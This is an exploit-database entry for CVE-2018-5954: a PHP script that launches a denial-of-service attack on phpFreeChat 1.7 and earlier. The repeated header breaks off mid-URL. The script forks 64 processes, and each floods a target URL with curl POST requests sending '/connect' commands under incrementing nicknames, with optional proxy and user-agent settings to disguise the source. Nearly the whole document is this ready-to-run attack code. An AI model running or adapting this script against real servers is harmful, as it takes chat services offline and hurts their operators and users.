# Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service
# Version: 1.7 and earlier
# Date: 21/01/2018
# Vendor Homepage: http://www.phpfreechat.net
# Software Link: http:/ # Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service
# Version: 1.7 and earlier
# Date: 21/01/2018
# Vendor Homepage: http://www.phpfreechat.net
# Software Link: http://www.phpfreechat.net/download
# Exploit Author: A. Pakbaz
# CVE : CVE-2018-5954
####################################################
<?php
$host="http://example.com/path/index.php"; //Vulnerable Host
$con_num=64; //Number of Connections
$proxy=''; //Proxy example http://127.0.0.1:8080
$user_agent=''; //User-Agent
$proxy=$proxy!='' ? "-x " . $proxy : '';
$user_agent=$user_agent!='' ? "-A " . $user_agent : '';
echo "##Vulnerability Discovered by A. Pakbaz ##Exploit Author: A. Pakbaz ";
echo "##Contact: x70x61x6bx62x61x7ax40x70x72x6fx74x6fx6ex6dx61x69x6cx2ex63x6fx6d ";
echo "##PGP key: x45x33x35x35x35x32x34x43x34x44x37x45x31x36x43x38x46x38x34x38x35x41x36x46x35x31x32x39x30x34x46x35x45x44x42x45x33x43x41x41 ";
function runf($id){
global $con_num;
global $host;
global $proxy;
global $user_agent;
$i=$id*1000000/$con_num;
$f=($id+1)*1000000/$con_num;
for($num=$i; $num<$f; $num++){
`curl --url '$host' -X POST -d "pfc_ajax=1&f=handleRequest&cmd=%2Fconnect%20a95806d727683c9c42694214fe"$num"%200%20%22"$num"%22" -N --stderr /dev/null --compressed $proxy $user_agent`;
echo ".";
}
}
function fmaker($pno){
global $con_num;
if($pno>1){
$pid=pcntl_fork();
if($pid<0){
echo " Error! Reduce the number of connections ";
}
elseif($pid)
fmaker($pno-1);
else
runf($con_num-$pno);
}
elseif($pno==1)
runf($con_num-1);
}
fmaker($con_num);
?>